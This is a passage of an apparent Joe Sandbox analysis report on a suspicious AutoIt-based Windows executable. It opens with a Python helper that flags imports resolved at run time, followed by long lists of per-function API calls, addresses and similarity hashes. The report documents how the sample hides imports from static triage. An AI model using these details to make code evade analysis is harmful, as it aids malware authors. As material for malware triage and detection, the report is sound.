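The entries above list each function's API calls in one fixed line layout, and several of them resolve imports at run time: LoadLibraryA of ICMP.DLL, advapi32.dll and kernel32.dll, each followed by GetProcAddress with the export name as its second argument. Those names do not appear in the PE import table, so they are easy to miss when triaging only static imports. The following Python script is an added example, not Joe Sandbox code and not part of this report: it parses the report's "APIs" lines and pairs every LoadLibrary call with the symbolic names passed to the GetProcAddress calls that follow it in the same function. The regex, the class and function names are my own; SAMPLE is a constructed text built from API lines copied from this report and recombined into three entries; the image base 0x400000 is taken from the "Offset: 00400000" field of the Memory Dump Source.

```python
"""Parse Joe Sandbox per-function 'APIs' entries and flag run-time import
resolution (LoadLibrary* followed by GetProcAddress).

Added example for this report page, not Joe Sandbox code.  SAMPLE is a
constructed text built from API lines copied from the report above.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

IMAGE_BASE = 0x400000  # "Offset: 00400000" in the report's Memory Dump Source

# Constructed sample: three function entries in the report's line layout.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Memory Dump Source
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Memory Dump Source
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
"""

# One API line: optional "Part of subcall function X:" prefix, then
# Api.MODULE, optional "(args)", then "ref: <hex call-site address>".
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# A GetProcAddress name argument that is a raw value or unknown ("?").
HEX_OR_UNKNOWN = re.compile(r"^(?:[0-9A-Fa-f]{8}|\?)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int        # virtual address of the call site
    subcall: bool   # reported from a callee rather than this function


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)


def rva(address: int, base: int = IMAGE_BASE) -> int:
    """Relative virtual address of a call site, for cross-referencing in IDA."""
    return address - base


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the report text into function entries, one per 'APIs' header."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if stripped in ("Strings", "Memory Dump Source"):
            current = None  # the API list of this entry has ended
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(
                ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None)
            )
    return entries


def resolved_imports(entry: FunctionEntry) -> List[Tuple[str, str]]:
    """Pair each LoadLibraryA/W(dll) with the symbolic names passed to the
    GetProcAddress calls that follow it in the same function."""
    pairs: List[Tuple[str, str]] = []
    dll: Optional[str] = None
    for call in entry.calls:
        if call.api.startswith("LoadLibrary") and call.args:
            dll = call.args[0]
        elif call.api == "GetProcAddress" and len(call.args) >= 2 and dll is not None:
            name = call.args[1]
            if not HEX_OR_UNKNOWN.match(name):  # skip ordinals / unresolved names
                pairs.append((dll.lower(), name))
    return pairs


def dynamic_imports(text: str) -> List[Tuple[str, str]]:
    """All (dll, export) pairs resolved at run time across the report text."""
    found: List[Tuple[str, str]] = []
    for entry in parse_entries(text):
        found.extend(resolved_imports(entry))
    return found


if __name__ == "__main__":
    for dll, name in dynamic_imports(SAMPLE):
        print(f"{dll} -> {name}")
```

Run against the full text of a report, the output is the list of exports the sample fetches by name outside its import table; the ICMP.DLL and advapi32.dll pairs here come from the entries above, while the third entry shows that a function with no LoadLibrary call contributes nothing. The call-site addresses are kept as integers so that rva() can turn them into offsets usable in the IDA snapshot referenced by each entry.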
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0047950F
                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                      • VariantClear.OLEAUT32(?), ref: 00479650
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$AllocClearCopyInitString
                      • String ID:
                      • API String ID: 2808897238-0
                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                      APIs
                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                      • __itow.LIBCMT ref: 004699CD
                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                      • __itow.LIBCMT ref: 00469A97
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$__itow
                      • String ID:
                      • API String ID: 3379773720-0
                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                      • ScreenToClient.USER32(?,?), ref: 00449A80
                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Similarity
                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                      • String ID:
                      • API String ID: 2782032738-0
                      APIs
                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                      • GetWindowRect.USER32(?,?), ref: 00441722
                      • PtInRect.USER32(?,?,?), ref: 00441734
                      • MessageBeep.USER32(00000000), ref: 004417AD
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      APIs
                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                      • __isleadbyte_l.LIBCMT ref: 004208A6
                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      APIs
                      • GetParent.USER32(?), ref: 004503C8
                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                      Similarity
                      • API ID: Proc$Parent
                      • String ID:
                      • API String ID: 2351499541-0
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                      • TranslateMessage.USER32(?), ref: 00442B01
                      • DispatchMessageW.USER32(?), ref: 00442B0B
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                      Similarity
                      • API ID: Message$Peek$DispatchTranslate
                      • String ID:
                      • API String ID: 1795658109-0
                      APIs
                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                      • GetCaretPos.USER32(?), ref: 004743B2
                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                      • GetForegroundWindow.USER32 ref: 004743EE
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      APIs
                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                      • _wcslen.LIBCMT ref: 00449519
                      • _wcslen.LIBCMT ref: 00449526
                      Similarity
                      • API ID: MessageSend_wcslen$_wcspbrk
                      • String ID:
                      • API String ID: 2886238975-0
                      APIs
                      Similarity
                      • API ID: __setmode$DebugOutputString_fprintf
                      • String ID:
                      • API String ID: 1792727568-0
                      APIs
                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                      Similarity
                      • API ID: Window$Long$AttributesLayered
                      • String ID:
                      • API String ID: 2169480361-0
                      APIs
                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                      Strings
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                      • String ID: cdecl
                      • API String ID: 3850814276-3896280584
                      APIs
                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                      • _memmove.LIBCMT ref: 0046D475
                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                      Similarity
                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 2502553879-0
                      APIs
                      • SendMessageW.USER32 ref: 00448C69
                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                      Similarity
                      • API ID: MessageSend$LongWindow
                      • String ID:
                      • API String ID: 312131281-0
                      APIs
                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                      Similarity
                      • API ID: ErrorLastacceptselect
                      • String ID:
                      • API String ID: 385091864-0
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                      • GetStockObject.GDI32(00000011), ref: 00430258
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                      Similarity
                      • API ID: Window$CreateMessageObjectSendShowStock
                      • String ID:
                      • API String ID: 1358664141-0
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2880819207-0
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      APIs
                      • __wsplitpath.LIBCMT ref: 0043392E
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • __wsplitpath.LIBCMT ref: 00433950
                      • __wcsicoll.LIBCMT ref: 00433974
                      • __wcsicoll.LIBCMT ref: 0043398A
                      Similarity
                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                      • String ID:
                      • API String ID: 1187119602-0
                      APIs
                      Similarity
                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                      • String ID:
                      • API String ID: 1597257046-0
                      APIs
                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                      • __malloc_crt.LIBCMT ref: 0041F5B6
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                      Similarity
                      • API ID: EnvironmentStrings$Free__malloc_crt
                      • String ID:
                      • API String ID: 237123855-0
                      APIs
                      Similarity
                      • API ID: DeleteDestroyObject$IconWindow
                      • String ID:
                      • API String ID: 3349847261-0
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                      Similarity
                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                      • String ID:
                      • API String ID: 2223660684-0
                      APIs
                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                      • LineTo.GDI32(?,?,?), ref: 00447326
                      • EndPath.GDI32(?), ref: 00447336
                      • StrokePath.GDI32(?), ref: 00447344
                      Similarity
                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                      • String ID:
                      • API String ID: 2783949968-0
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      APIs
                      • GetDesktopWindow.USER32 ref: 00472B63
                      • GetDC.USER32(00000000), ref: 00472B6C
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      APIs
                      • GetDesktopWindow.USER32 ref: 00472BB2
                      • GetDC.USER32(00000000), ref: 00472BBB
                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      APIs
                      • __getptd_noexit.LIBCMT ref: 00415150
                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                      • __freeptd.LIBCMT ref: 0041516B
                      • ExitThread.KERNEL32 ref: 00415173
                      Similarity
                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                      • String ID:
                      • API String ID: 1454798553-0
                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _strncmp
                      • String ID: Q\E
                      • API String ID: 909875538-2189900498
                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                      APIs
                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                      • String ID: AutoIt3GUI$Container
                      • API String ID: 2652923123-3941886329
                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove_strncmp
                      • String ID: U$\
                      • API String ID: 2666721431-100911408
